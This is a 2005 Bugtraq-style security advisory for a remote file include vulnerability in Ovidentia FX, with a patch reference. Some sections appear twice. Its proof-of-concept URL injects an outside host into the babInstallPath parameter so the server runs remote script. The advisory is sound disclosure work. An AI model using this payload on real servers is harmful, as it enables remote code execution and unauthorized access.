Ovidentia FX Remote File Include Vulnerability
BID:13927
Info
Ovidentia FX Remote File Include Vulnerability
| Bugtraq ID: | 13927 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 10 2005 12:00AM |
| Updated: | Jun 10 2005 12:00AM |
| Credit: | Discovery is credited to Status-x <[email protected]>. |
| Vulnerable: |
Ovidentia Ovidentia FX |
| Not Vulnerable: | |
Discussion
Ovidentia FX Remote File Include Vulnerability
Ovidentia FX is prone to a remote file include vulnerability.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
Ovidentia FX is prone to a remote file include vulnerability.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
Exploit / POC
Ovidentia FX Remote File Include Vulnerability
An exploit is not required.
A proof of concept example is available:
http://www.example.com/ovidentia/index.php?babInstallPath=http://www.example.com
An exploit is not required.
A proof of concept example is available:
http://www.example.com/ovidentia/index.php?babInstallPath=http://www.example.com
Solution / Fix
Ovidentia FX Remote File Include Vulnerability
Solution:
The vendor has confirmed this issue and released a patch. Please visit the following location for more information:
http://www.ovidentia.org/index.php?tg=articles&idx=More&topics=1&article=290
Solution:
The vendor has confirmed this issue and released a patch. Please visit the following location for more information:
http://www.ovidentia.org/index.php?tg=articles&idx=More&topics=1&article=290
References
Ovidentia FX Remote File Include Vulnerability
References:
References:
- Ovidentia FX Product Page (Ovidentia)
- Ovidentia Portal Version X.X Remote File Include (Status-x)